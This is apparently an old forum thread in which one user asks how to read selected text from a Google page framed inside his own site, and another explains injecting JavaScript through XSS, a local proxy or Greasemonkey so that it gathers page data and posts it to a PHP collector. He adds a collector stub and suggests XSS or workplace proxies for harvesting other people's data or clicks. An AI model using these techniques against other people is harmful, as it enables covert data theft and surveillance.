can u read selected text in an iframed google page?!?!?!

[jojoba]

hi

welcome to cross domain fun!
i am serving an asp page.
i have an iframe in the page pointing to another domain, say,
http://www.google.com.
ok, i know, different domains.
i know i can communicate data between the parent page and the iframe
using the fragment identifier technique.
however, i would like to be able to actually get data, via javascript,
to send along this channel.
specifically, can i, using javascript, ask the google iframe doc for
any selected text (among other things)?
i mean, what's the point of being able to communicate across cross-
domain frames if i cant get data from them in the first place
think i'm missing something big here

thanks for any help here,
jojoba

 

[shimmyshack]

hi

welcome to cross domain fun!
i am serving an asp page.
i have an iframe in the page pointing to another domain, say,http://www.google.com.
ok, i know, different domains.
i know i can communicate data between the parent page and the iframe
using the fragment identifier technique.
however, i would like to be able to actually get data, via javascript,
to send along this channel.
specifically, can i, using javascript, ask the google iframe doc for
any selected text (among other things)?
i mean, what's the point of being able to communicate across cross-
domain frames if i cant get data from them in the first place
think i'm missing something big here

thanks for any help here,
jojoba

whats the point of XSS if you can just ask for the data. However if
you are just talking about YOUR browser, then you can inject js into
the google iframe to send data back through proxies, so it does depend
on your need. If you are asking "how can I get users to log on to my
website and allow me to grab their google data" the answer is by using
one of the current XSS vulnerabilties in google, or by some browser
security issue, but officially you cant.

 

[jojoba]

hi again
thx for the rapid response!

shimmyshack, you said:
<<
"then you can inject js into the google iframe to send data back
through proxies"
1) does "send data back thru proxies" mean using another hidden iframe
to proxy? (not sure i totally understand)

2) and also, after injecting the js, will i then have full document
access (e.g. get selected text, or mouse position?) or will that still
be limited?

thx so much for the help,
jojoba

 

[shimmyshack]

hi again
thx for the rapid response!

shimmyshack, you said:
<<
"then you can inject js into the google iframe to send data back
through proxies"



1) does "send data back thru proxies" mean using another hidden iframe
to proxy? (not sure i totally understand)

2) and also, after injecting the js, will i then have full document
access (e.g. get selected text, or mouse position?) or will that still
be limited?

thx so much for the help,
jojoba

well injecting javascript into the iframe means you can send data
anywhere.
You just have to get that code in there, normally you would do it
using XSS, but you can do it if you run a local proxym which adds a
bit of code as the html markup passes by, for certain URLs, or merely
using greasemonkey in firwfos to inject the script. The script gathers
the required info from the google page, and then sends it either as a
post to an injected iframe (within the google iframe) of via the query
string of an image or whatever.

Imagine you have server A you control, your browsing server A which
contains iframe of serverB, you inject code into serverBs page, which
appends an iframe and gathers data, and post it back to serverA where
it can be got from the parent page and used, so completing the circle.
It depends on being able to inject code into serverB iframe, which you
can do as its your machine and you are free to modify the stream as it
arrives. If at work, your proxy can do the same thing net wide. That
makes it possible to inject code that shows IT staff what users click
on and so on... using XSS in non SSL page.
Does that all make sense?

It can get more complicated, imagine the case where you have 2 local
machines, 1 and 2, you browsing using 1 with foxy proxy on with URL
rules matching certain requests to the victims server (3) you run
apache on 2 with a vhost setup machine the domain name of 3, then
foxyproxy proxies certain URLS matching domain 3 to machine 2, not all
but just some. This means that you are mixing 3 and 2 and provided you
create some logic on 2 you can get complete control of the code
running in your browser apparently all on the same domain but not, so
you can actually POST back to 2 the data you get from 3, theres no
domain difference but the data that ends up in the mysql database on 2
can be directly requested by 1 which is browsing a webpage which might
have iframes from domains on 3 and 2, the data can be proxied via
foxyproxy from 2 and mixed...

Anyway all this makes a mockery of cross domain stuff, as you are only
ever using the same domains for all this. In times past I have used
this to mix and match data between sites where I want a record of
everything I have looked at stored in mysql, and need to avoid
problems with postback and other "domain checks"

anyway, hope that all made sense.

 

[jojoba]

wow!
thank you shimmyshack.
that was pretty clear. but i still do have a couple questions (please
excuse my novice-ness).

you said:
<<
You just have to get that code in there, normally you would do it
using XSS, but you can do it if you run a local proxym which adds a
bit of code as the html markup passes by, for certain URLs
do you recommend i go with xss instead of the proxy method (i mean, am
i making this too hard)?
otherwise, if i run a local proxy, does that mean my google iframe is
now within same domain as parent document (and so i can access
whatever i want inside that iframe)?

you said:
<<
The script gathers the required info from the google page, and then
sends it either as a post to an injected iframe (within the google
iframe) of via the query string of an image or whatever.
after i have injected the script to retrieve the info, i'm still not
sure how to get that info back out of the google iframe. i see you
mentioned posting it to an injected iframe, but i don't see how the
info in that iframe can be retrieved?

thanks again for all your help,
jojoba

 

[shimmyshack]

wow!
thank you shimmyshack.
that was pretty clear. but i still do have a couple questions (please
excuse my novice-ness).

you said:
<<
You just have to get that code in there, normally you would do it
using XSS, but you can do it if you run a local proxym which adds a
bit of code as the html markup passes by, for certain URLs



do you recommend i go with xss instead of the proxy method (i mean, am
i making this too hard)?

I would go with either a proxy, or greasemonkey more probably.

otherwise, if i run a local proxy, does that mean my google iframe is
now within same domain as parent document (and so i can access
whatever i want inside that iframe)?

see below, although they are on different domains, the proxy allows
modification of markup as it passes by (you must somehow program your
proxy to inject markup as needed - fiddlertool allows this) this new
markup would be a script to gather data, and an iframe where to post
the data.

you said:
<<
The script gathers the required info from the google page, and then
sends it either as a post to an injected iframe (within the google
iframe) of via the query string of an image or whatever.



after i have injected the script to retrieve the info, i'm still not
sure how to get that info back out of the google iframe. i see you
mentioned posting it to an injected iframe, but i don't see how the
info in that iframe can be retrieved?

thanks again for all your help,
jojoba

well you must run a webserver somewhere with a php page that accepts a
POST payload
ideally this will be on the same domain as the parent frame
so
<?php
var_dump( $_POST );
//shove the data into mysql (or whatever)
?>
the javascript you inject into the google markup /is/ on the same
domain as the google data of course so it has the right to gather
data.


<script type="text/javascript">
//grab data you want from google

//fill out a form
//(which you have also injected)
//with the data gathered

//now post this form to the iframe
//(also injected)

//the action of the form dictates
//where the post payload goes
//it will be the url of the above php script
//you then put that data in mysql or whatever.
</script>

now that you have the data on your server in mysql, you can retrieve
it using ajax or whatever from the parent frame of the same domain.

It is perfectly possible to post data to a different domain, thats the
kind of thing that you do all the time. People use this method for
instance to post to watchfire prefilling the form out, or it is used
to track users on some stats sites. You can use it to gradually
collect data from an entire site as you browse. Greasemonkey is cool
for this, or chickenfoot, asit will do the browsing for you as well.
You might want all the lat/lons from somewhere or whatever, nothing
sinister I hope! Do no dr. evil. 1 milleeon dollars